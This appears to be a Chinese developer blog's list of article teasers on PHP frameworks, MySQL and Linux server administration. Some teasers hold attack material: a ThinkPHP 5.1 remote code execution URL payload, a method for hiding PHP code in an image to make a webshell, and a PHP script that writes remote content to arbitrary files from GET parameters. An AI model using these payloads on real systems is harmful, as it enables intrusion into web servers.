原创 ThinkPHP5 框架缺陷導致遠程命令執行
TP5.1.* thinkphp5.1.29爲例 1、代碼執行:phpinfo(); http://zhiliao.cn/?s=index/\think\Request/input&filter=phpinfo&data=1 2、命令
原创 複雜構造器laravel連表多表綜合
/** * 商會商機列表 * @param type $condition * @param type $field * @param type $order * @param type
原创 寫入靜態文件代碼
<?php set_time_limit(0); if(isset($_GET['url']) && isset($_GET['filename'])){ if(httpcopy($_GET['url'], $_GET['filen
原创 數據庫定時備份linux
前提需要保證你的Linux服務器已經安裝了MYSQl數據庫服務。 1、創建shell腳本 vim backupdb.sh 導出二進制數據壓縮包 #!/bin/sh /usr/bin/mysqldump -B -uroot -p1234
原创 利用copy命令合成一個圖片馬使用
第一種方法: 利用copy命令 詳細操作爲 1.隨便找一張圖片 名字改成1.jpg(名字改爲1.jpg只是爲了方便記憶和輸入 文件的後綴隨意 只要是圖片的格式就可以了) 2.<?php phpinfo();?> 存爲1
原创 lnmp版本更新和php版本升級多版本運行
打開lnmp1.5安裝文件夾 cd lnmp1.5/ ./install.sh mphp sudo ./install.sh mphp
原创 阿里雲短信類最新版dysmsapi.aliyuncs.com
<?php class Sendsms { public static $accessKeyId = "********"; public static $accessKeySecret = "********
原创 laravel驗證碼類
Installation The Captcha Service Provider can be installed via Composer by requiring the mews/captcha package and setti
原创 Laravel GET,POST 請求 API 接口,使用自定義表單驗證,驗證失敗跳轉回首頁的問題記錄
這個問題是因爲 FormRequest 中在驗證規則失敗時,會調用 failedValidation 方法,該方法的代碼: namespace Illuminate\Foundation\Http; class FormRequest
原创 lnmp多版本php安裝擴展
有的 php 程序是需要擴展支持才能正常運行的,比如需要 Fileinfo 擴展,而 php 一鍵環境有很多種,今天說的是 lnmp1.4 一鍵環境包。本文在 lnmp1.4 版本下測試通過,請一定要在測試環境確認安裝無誤了,再在生產環境
原创 關於NiuShop2.6版本系統安全防護方案
1、TP框架遠程執行漏洞的處理方案 下載“thinkphp5遠程執行代碼漏洞修復補丁.zip”,替換文件 2、upload上傳文件的處理方案 下載“niushop_b2c2.6版本upload優化.zip”,替換文件 3、服務器安全防護權
原创 MySQL數據庫的存放目錄
1.停掉mysql服務器: /etc/init.d/mysql stop 2.下面新目錄以/data/mysql/ 爲例,然後複製舊目錄的數據庫到新目錄: cp -R /usr/local/mysql/var/* /data/mysql/
原创 centos7服務器重啓
數據庫 systemctl stop mysqld.service systemctl start mysqld.service systemctl status mysqld.service php systemctl stop ph
原创 創建mysql賬號並可以遠程連接
mysql5.6 all代表接受所有操作,比如 select,insert,delete....; *.* 代表所有庫下面的所有表;% 代表這個用戶允許從任何地方登錄;爲了安全期間,這個%可以替換爲你允許的ip地址; create u
原创 centos服務器常用命令
查看帶寬 ifconfig #查看網卡信息 sudo ethtool eth0 #根據網卡信息查看帶寬 查看服務器壓力 top 查看端口情況 netstat -ntpl